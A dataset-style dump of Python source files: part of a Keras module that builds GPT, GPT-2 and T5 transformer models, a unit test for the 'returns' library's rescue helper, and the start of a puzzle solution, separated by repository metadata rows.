if self.shared_segment_embeddings:
name = 'Embedding-Token'
else:
name = 'Embedding-Segment'
s = self.apply(
inputs=s,
layer=Embedding,
input_dim=self.segment_vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
name=name
)
x = self.apply(
inputs=[x, s], layer=Add, name='Embedding-Token-Segment'
)
x = self.apply(
inputs=self.simplify([x, p]),
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
custom_position_ids=self.custom_position_ids,
name='Embedding-Position'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_final_layers(self, inputs):
"""剩余部分
"""
x = inputs
# Language Model部分
x = self.apply(
inputs=x,
layer=Embedding,
arguments={'mode': 'dense'},
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Activation,
activation=self.final_activation,
name='LM-Activation'
)
return x
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(GPT, self).load_variable(checkpoint, name)
if name == 'gpt/embeddings/word_embeddings':
return self.load_embeddings(variable)
else:
return variable
def variable_mapping(self):
"""映射到TF版GPT权重格式
"""
mapping = super(GPT, self).variable_mapping()
mapping = {
k: [
i.replace('bert/', 'gpt/').replace('encoder', 'transformer')
for i in v
]
for k, v in mapping.items()
}
return mapping
class GPT2(GPT):
"""构建GPT2模型
链接: https://github.com/openai/gpt-2
"""
def get_inputs(self):
"""GPT2的输入是token_ids
"""
x_in = self.apply(
layer=Input, shape=(self.sequence_length,), name='Input-Token'
)
return x_in
def apply_embeddings(self, inputs):
"""GPT2的embedding是token、position两者embedding之和
"""
x = inputs
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
name='Embedding-Position'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""GPT2的主体是基于Self-Attention的模块
顺序:LN --> Att --> Add --> LN --> FFN --> Add
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
x = self.apply(
inputs=[x, x, x, attention_mask],
layer=MultiHeadAttention,
arguments={'a_bias': True},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
return x
def apply_final_layers(self, inputs):
"""剩余部分
"""
x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Output-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Output-Dropout'
)
x = super(GPT2, self).apply_final_layers(x)
return x
def variable_mapping(self):
"""映射到TF版GPT2权重格式
"""
mapping = super(GPT2, self).variable_mapping()
mapping = {
k: [i.replace('output/LayerNorm', 'input/LayerNorm') for i in v]
for k, v in mapping.items()
}
mapping['Output-Norm'] = [
'gpt/output/LayerNorm/beta',
'gpt/output/LayerNorm/gamma',
]
return mapping
class GPT2_ML(GPT):
"""构建GPT2_ML模型
链接: https://github.com/imcaspar/gpt2-ml
注意:GPT2_ML虽然号称GPT2,但是它的结构其实更接近GPT,它自称GPT2的
原因大概是因为它开源的版本参数量达到了GPT2的15亿参数。
"""
def get_inputs(self):
"""GPT2_ML的输入是token_ids
"""
x_in = self.apply(
layer=Input, shape=(self.sequence_length,), name='Input-Token'
)
return x_in
def apply_embeddings(self, inputs):
"""GPT2_ML的embedding是token、position两者embedding之和
"""
x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
name='Embedding-Position'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Embedding-Norm'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""GPT2_ML的主体是基于Self-Attention的模块
顺序:Att --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi, x, arguments = x, [x, x, x, attention_mask], {'a_bias': True}
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm-0' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm-1' % feed_forward_name
)
return x
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(GPT2_ML, self).load_variable(checkpoint, name)
if name == 'newslm/embeddings/word_embed':
return self.load_embeddings(variable)
else:
return variable
def variable_mapping(self):
"""映射到官方GPT2_ML权重格式
"""
mapping = {
'Embedding-Token': ['newslm/embeddings/word_embed'],
'Embedding-Position': ['newslm/embeddings/pos_embed'],
'Embedding-Norm': [
'newslm/embeddings/LayerNorm_embed_norm/beta',
'newslm/embeddings/LayerNorm_embed_norm/gamma',
],
}
for i in range(self.num_hidden_layers):
prefix = 'newslm/layer%02d/' % i
mapping.update({
'Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'query_layer/kernel',
prefix + 'query_layer/bias',
prefix + 'key_layer/kernel',
prefix + 'key_layer/bias',
prefix + 'value_layer/kernel',
prefix + 'value_layer/bias',
prefix + 'context_projection_layer/kernel',
prefix + 'context_projection_layer/bias',
],
'Transformer-%d-FeedForward-Norm-0' % i: [
prefix + 'LayerNorm_mlp_ln0/beta',
prefix + 'LayerNorm_mlp_ln0/gamma',
],
'Transformer-%d-FeedForward' % i: [
prefix + 'intermediate/kernel',
prefix + 'intermediate/bias',
prefix + 'output/kernel',
prefix + 'output/bias',
],
'Transformer-%d-FeedForward-Norm-1' % i: [
prefix + 'LayerNorm_mlp_ln1/beta',
prefix + 'LayerNorm_mlp_ln1/gamma',
],
})
return mapping
class T5_Base(Transformer):
"""Google的T5模型(基类)
注意T5有两个版本,一开始放出来的版本称为t5.1.0,而后来放出了一个升级
版本称为t5.1.1,两者结构略有不同,包括后来放出来的多国语言版T5也采用
了t5.1.1的结构。
t5.1.0: https://github.com/google-research/text-to-text-transfer-transformer
t5.1.1: https://github.com/google-research/text-to-text-transfer-transformer/blob/master/released_checkpoints.md#t511
multilingual-t5: https://github.com/google-research/multilingual-t5
"""
@insert_arguments(version='t5.1.0')
def __init__(self, **kwargs):
super(T5_Base, self).__init__(**kwargs)
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(T5_Base, self).load_variable(checkpoint, name)
if name == 'shared/embedding':
return self.load_embeddings(variable)
elif name == 'decoder/logits/kernel':
return self.load_embeddings(variable.T).T
elif 'relative_attention_bias' in name:
return variable.T
else:
return variable
def create_variable(self, name, value, dtype=None):
"""在tensorflow中创建一个变量
"""
if 'relative_attention_bias' in name:
value = value.T
return super(T5_Base, self).create_variable(name, value, dtype)
def variable_mapping(self):
"""映射到官方T5权重格式
"""
mapping = {
'Embedding-Token': ['shared/embedding'],
'Encoder-Embedding-Relative-Position': [
'encoder/block_000/layer_000/SelfAttention/relative_attention_bias'
],
'Encoder-Output-Norm': ['encoder/final_layer_norm/scale'],
'Decoder-Embedding-Relative-Position': [
'decoder/block_000/layer_000/SelfAttention/relative_attention_bias',
],
'Decoder-Output-Norm': ['decoder/final_layer_norm/scale'],
}
for i in range(self.num_hidden_layers):
# Encoder主体
prefix = 'encoder/block_%03d/' % i
mapping.update({
'Encoder-Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'layer_000/SelfAttention/q',
prefix + 'layer_000/SelfAttention/k',
prefix + 'layer_000/SelfAttention/v',
prefix + 'layer_000/SelfAttention/o',
],
'Encoder-Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'layer_000/layer_norm/scale',
],
'Encoder-Transformer-%d-FeedForward' % i: [
prefix + 'layer_001/DenseReluDense/wi/kernel',
prefix + 'layer_001/DenseReluDense/wo/kernel',
],
'Encoder-Transformer-%d-FeedForward-Norm' % i: [
prefix + 'layer_001/layer_norm/scale',
],
})
# Decoder主体
prefix = 'decoder/block_%03d/' % i
mapping.update({
'Decoder-Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'layer_000/SelfAttention/q',
prefix + 'layer_000/SelfAttention/k',
prefix + 'layer_000/SelfAttention/v',
prefix + 'layer_000/SelfAttention/o',
],
'Decoder-Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'layer_000/layer_norm/scale',
],
'Decoder-Transformer-%d-MultiHeadCrossAttention' % i: [
prefix + 'layer_001/EncDecAttention/q',
prefix + 'layer_001/EncDecAttention/k',
prefix + 'layer_001/EncDecAttention/v',
prefix + 'layer_001/EncDecAttention/o',
],
'Decoder-Transformer-%d-MultiHeadCrossAttention-Norm' % i: [
prefix + 'layer_001/layer_norm/scale',
],
'Decoder-Transformer-%d-FeedForward' % i: [
prefix + 'layer_002/DenseReluDense/wi/kernel',
prefix + 'layer_002/DenseReluDense/wo/kernel',
],
'Decoder-Transformer-%d-FeedForward-Norm' % i: [
prefix + 'layer_002/layer_norm/scale',
],
})
if self.version == 't5.1.1':
mapping['Encoder-Output-Norm'] = ['encoder/rms_norm/scale']
mapping['Decoder-Output-Norm'] = ['decoder/rms_norm/scale']
mapping['Decoder-Output-LM'] = ['decoder/logits/kernel']
mapping = {
k: [i.replace('layer_norm', 'rms_norm') for i in v]
for k, v in mapping.items()
}
for i in range(self.num_hidden_layers):
for layer in [
'Encoder-Transformer-%d-FeedForward' % i,
'Decoder-Transformer-%d-FeedForward' % i
]:
mapping[layer] = [
mapping[layer][0][:-7] + '_0' + mapping[layer][0][-7:],
mapping[layer][0][:-7] + '_1' + mapping[layer][0][-7:],
mapping[layer][1]
]
return mapping
class T5_Encoder(T5_Base):
"""Google的T5模型(Encoder)
"""
def get_inputs(self):
"""T5的Encoder的输入只有token_ids
"""
x_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Encoder-Input-Token'
)
return x_in
def apply_embeddings(self, inputs):
"""T5的embedding只有token embedding,
并把relative position embedding准备好,待attention使用。
"""
x = inputs
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Encoder-Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Encoder-Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""T5的Encoder的主体是基于Self-Attention的模块
顺序:LN --> Att --> Add --> LN --> FFN --> Add
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Encoder-Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Encoder-Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias(x)
# Self Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
x = self.apply(
inputs=[x, x, x, position_bias],
layer=MultiHeadAttention,
arguments={'p_bias': 't5_relative'},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
use_bias=False,
attention_scale=False,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
use_bias=False,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
return x
def apply_final_layers(self, inputs):
"""剩余部分
"""
x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Encoder-Output-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Encoder-Output-Dropout'
)
return x
def compute_position_bias(self, inputs=None):
"""T5相对位置编码
"""
if self.position_bias is None:
x = inputs
p = self.apply(
inputs=[x, x],
layer=RelativePositionEmbeddingT5,
input_dim=32,
output_dim=self.num_attention_heads,
bidirectional=True,
embeddings_initializer=self.initializer,
name='Encoder-Embedding-Relative-Position'
)
self.position_bias = p
return self.position_bias
class T5_Decoder(LM_Mask, T5_Base):
"""Google的T5模型(Decoder)
"""
def __init__(self, with_lm=True, **kwargs):
super(T5_Decoder, self).__init__(**kwargs)
self.with_lm = with_lm
def get_inputs(self):
"""T5的Decoder的输入为context序列和token_ids
"""
c_in = self.apply(
layer=Input,
shape=(self.sequence_length, self.hidden_size),
name='Input-Context'
)
x_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Decoder-Input-Token'
)
return [c_in, x_in]
def apply_embeddings(self, inputs):
"""T5的embedding只有token embedding,
并把relative position embedding准备好,待attention使用。
"""
c, x = inputs
c = self.apply(
inputs=c, layer=Masking, mask_value=0.0, name='Masked-Context'
)
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Decoder-Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Decoder-Embedding-Mapping'
)
return [c, x]
def apply_main_layers(self, inputs, index):
"""T5的Dencoder主体是基于Self-Attention、Cross-Attention的模块
顺序:LN --> Att1 --> Add --> LN --> Att2 --> Add --> LN --> FFN --> Add
"""
c, x = inputs
z = self.layer_norm_conds[0]
self_attention_name = 'Decoder-Transformer-%d-MultiHeadSelfAttention' % index
cross_attention_name = 'Decoder-Transformer-%d-MultiHeadCrossAttention' % index
feed_forward_name = 'Decoder-Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias([x, c])
# Self Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % self_attention_name
)
x = self.apply(
inputs=[x, x, x, attention_mask, position_bias[0]],
layer=MultiHeadAttention,
arguments={
'a_bias': True,
'p_bias': 't5_relative'
},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
use_bias=False,
attention_scale=False,
kernel_initializer=self.initializer,
name=self_attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % self_attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % self_attention_name
)
# Cross Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % cross_attention_name
)
x = self.apply(
inputs=[x, c, c, position_bias[1]],
layer=MultiHeadAttention,
arguments={
'a_bias': None,
'p_bias': 't5_relative'
},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
use_bias=False,
attention_scale=False,
kernel_initializer=self.initializer,
name=cross_attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % cross_attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % cross_attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
use_bias=False,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
return [c, x]
def apply_final_layers(self, inputs):
"""剩余部分
"""
c, x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Decoder-Output-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Decoder-Output-Dropout'
)
x = self.apply(
inputs=x,
layer=Lambda,
function=lambda x: x / self.hidden_size**0.5,
mask=lambda i, m: m,
name='Decoder-Output-Scale'
)
if self.with_lm:
# 预测token概率部分
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.embedding_size,
kernel_initializer=self.initializer,
name='Decoder-Output-Mapping'
)
lm_activation = 'softmax' if self.with_lm is True else self.with_lm
if self.version == 't5.1.0':
x = self.apply(
inputs=x,
layer=Embedding,
arguments={'mode': 'dense'},
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Activation,
activation=lm_activation,
name='Dencoder-Output-LM-Activation'
)
else:
x = self.apply(
inputs=x,
layer=Dense,
units=self.vocab_size,
activation=lm_activation,
use_bias=False,
kernel_initializer=self.initializer,
name='Decoder-Output-LM'
)
return x
def compute_attention_bias(self, inputs=None):
"""修改LM Mask的序列长度(从 self.inputs[0] 改为 self.inputs[1] )
"""
old_inputs = self.inputs[:]
self.inputs = [old_inputs[1]]
mask = super(T5_Decoder, self).compute_attention_bias(inputs)
self.inputs = old_inputs
return mask
def compute_position_bias(self, inputs=None):
"""T5相对位置编码
"""
if self.position_bias is None:
x, c = inputs
p1 = self.apply(
inputs=[x, x],
layer=RelativePositionEmbeddingT5,
input_dim=32,
output_dim=self.num_attention_heads,
bidirectional=False,
embeddings_initializer=self.initializer,
name='Decoder-Embedding-Relative-Position'
)
p2 = self.apply(
inputs=[x, c],
layer=RelativePositionEmbeddingT5,
input_dim=32,
output_dim=self.num_attention_heads,
bidirectional=False,
embeddings_initializer=self.initializer,
name='Decoder-Embedding-Relative-Position'
)
self.position_bias = (p1, p2)
return self.position_bias
class T5(T5_Base):
"""Google的T5模型(Encoder-Decoder)
"""
def __init__(self, **kwargs):
super(T5, self).__init__(**kwargs)
kwargs['layers'] = self.layers
e_name, d_name = 'Encoder', 'Decoder'
if 'name' in kwargs:
e_name = '%s_%s' % (kwargs['name'], e_name)
d_name = '%s_%s' % (kwargs['name'], d_name)
del kwargs['name'] # 防止重复传参
self._encoder = T5_Encoder(name=e_name, **kwargs)
self._decoder = T5_Decoder(name=d_name, **kwargs)
def build(self, **kwargs):
"""同时构建Encoder和Decoder
"""
self._encoder.build(**kwargs)
self._decoder.build(**kwargs)
self.encoder = self._encoder.model
self.decoder = self._decoder.model
self.inputs = self.encoder.inputs + self.decoder.inputs[1:]
self.outputs = self.decoder(
self.encoder.outputs + self.decoder.inputs[1:]
)
self.model = Model(self.inputs, self.outputs)
def extend_with_language_model(BaseModel):
"""添加下三角的Attention Mask(语言模型用)
"""
class LanguageModel(LM_Mask, BaseModel):
"""带下三角Attention Mask的派生模型
"""
def __init__(self, *args, **kwargs):
super(LanguageModel, self).__init__(*args, **kwargs)
self.with_mlm = self.with_mlm or True
return LanguageModel
def extend_with_unified_language_model(BaseModel):
"""添加UniLM的Attention Mask(Seq2Seq模型用)
"""
class UnifiedLanguageModel(UniLM_Mask, BaseModel):
"""带UniLM的Attention Mask的派生模型
UniLM: https://arxiv.org/abs/1905.03197
"""
def __init__(self, *args, **kwargs):
super(UnifiedLanguageModel, self).__init__(*args, **kwargs)
self.with_mlm = self.with_mlm or True
return UnifiedLanguageModel
def build_transformer_model(
config_path=None,
checkpoint_path=None,
model='bert',
application='encoder',
return_keras_model=True,
**kwargs
):
"""根据配置文件构建模型,可选加载checkpoint权重
"""
configs = {}
if config_path is not None:
configs.update(json.load(open(config_path)))
configs.update(kwargs)
if 'max_position' not in configs:
configs['max_position'] = configs.get('max_position_embeddings', 512)
if 'dropout_rate' not in configs:
configs['dropout_rate'] = configs.get('hidden_dropout_prob')
if 'segment_vocab_size' not in configs:
configs['segment_vocab_size'] = configs.get('type_vocab_size', 2)
models = {
'bert': BERT,
'albert': ALBERT,
'albert_unshared': ALBERT_Unshared,
'roberta': BERT,
'nezha': NEZHA,
'roformer': RoFormer,
'electra': ELECTRA,
'gpt': GPT,
'gpt2': GPT2,
'gpt2_ml': GPT2_ML,
't5': T5,
't5_encoder': T5_Encoder,
't5_decoder': T5_Decoder,
't5.1.0': T5,
't5.1.0_encoder': T5_Encoder,
't5.1.0_decoder': T5_Decoder,
't5.1.1': T5,
't5.1.1_encoder': T5_Encoder,
't5.1.1_decoder': T5_Decoder,
}
if is_string(model):
model = model.lower()
MODEL = models[model]
if model.startswith('t5.1.1'):
configs['version'] = 't5.1.1'
else:
MODEL = model
application = application.lower()
if application in ['lm', 'unilm'] and model in ['electra', 't5']:
raise ValueError(
'"%s" model can not be used as "%s" application.\n' %
(model, application)
)
if application == 'lm':
MODEL = extend_with_language_model(MODEL)
elif application == 'unilm':
MODEL = extend_with_unified_language_model(MODEL)
transformer = MODEL(**configs)
transformer.build(**configs)
if checkpoint_path is not None:
transformer.load_weights_from_checkpoint(checkpoint_path)
if return_keras_model:
return transformer.model
else:
return transformer | [
"[email protected]"
] | |
cfdeb79292f967bfebee770e954dab908b791940 | 48db7bebad4309a7bca8b7dec2cc9193551f46a3 | /tests/test_pointfree/test_rescue.py | 3d49b3090ae848d51b47324261c89d0e5254c292 | [
"BSD-2-Clause"
] | permissive | kenjihiraoka/returns | bff6196a059d411b6c36f4a2e284e4439d24fd73 | 4589973520d7226b18acd7295d1a9a10ff032759 | refs/heads/master | 2022-11-20T13:20:41.094871 | 2020-07-07T08:23:05 | 2020-07-07T08:23:05 | 277,863,697 | 0 | 0 | BSD-2-Clause | 2020-07-07T16:09:25 | 2020-07-07T16:09:25 | null | UTF-8 | Python | false | false | 2,504 | py | from returns.context import RequiresContextIOResult, RequiresContextResult
from returns.io import IOFailure, IOResult, IOSuccess
from returns.pointfree import rescue
from returns.result import Failure, Result, Success
def _result_function(argument: int) -> Result[int, str]:
if argument > 0:
return Success(argument + 1)
return Failure('nope')
def _ioresult_function(argument: int) -> IOResult[int, str]:
if argument > 0:
return IOSuccess(argument + 1)
return IOFailure('nope')
def _context_result_function(
argument: int,
) -> RequiresContextResult[int, int, str]:
if argument > 0:
return RequiresContextResult(lambda deps: Success(argument + deps))
return RequiresContextResult.from_failure('nope')
def _context_ioresult_function(
argument: int,
) -> RequiresContextIOResult[int, int, str]:
if argument > 0:
return RequiresContextIOResult(lambda deps: IOSuccess(argument + deps))
return RequiresContextIOResult.from_failure('nope')
def test_rescue_with_ioresult():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_ioresult_function)
assert rescued(IOSuccess(1)) == IOSuccess(1)
assert rescued(IOFailure(1)) == IOSuccess(2)
assert rescued(IOFailure(0)) == IOFailure('nope')
def test_rescue_with_result():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_result_function)
assert rescued(Success(1)) == Success(1)
assert rescued(Failure(1)) == Success(2)
assert rescued(Failure(0)) == Failure('nope')
def test_rescue_with_context_result():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_context_result_function)
assert rescued(
RequiresContextResult.from_value(1),
)(1) == Success(1)
assert rescued(
RequiresContextResult.from_failure(1),
)(1) == Success(2)
assert rescued(
RequiresContextResult.from_failure(0),
)(1) == Failure('nope')
def test_rescue_with_context_ioresult():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_context_ioresult_function)
assert rescued(
RequiresContextIOResult.from_value(1),
)(1) == IOSuccess(1)
assert rescued(
RequiresContextIOResult.from_failure(1),
)(1) == IOSuccess(2)
assert rescued(
RequiresContextIOResult.from_failure(0),
)(1) == IOFailure('nope')
| [
"[email protected]"
] | |
9dec2bb4bd6c683b6ff8000f2bf62e0e6ec8d149 | f3dfd8d7ccd54fe4e94ba59437f76256ef9ef5c6 | /안채현/0805Thu_문자열/PR_숫자문자열과영단어_chae_dictionary1.py | 06bed93579c9330b2497826ffd2f9f21e6f276ac | [] | no_license | honglim99/studygroup | 366ceb0e4228e8417c8f094aba589067d6dbd3f0 | 20a67b13101a48f9d6b84668ba35518e2a2df5f6 | refs/heads/master | 2023-06-30T23:56:52.813849 | 2021-08-08T02:28:05 | 2021-08-08T02:28:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | """num_dict = {'zero':0, 'one':1, 'two':2, 'three':3, 'four':4, 'five':5, 'six':6, 'seven':7, 'eight':8, 'nine':9}
def solution(s):
answer = s
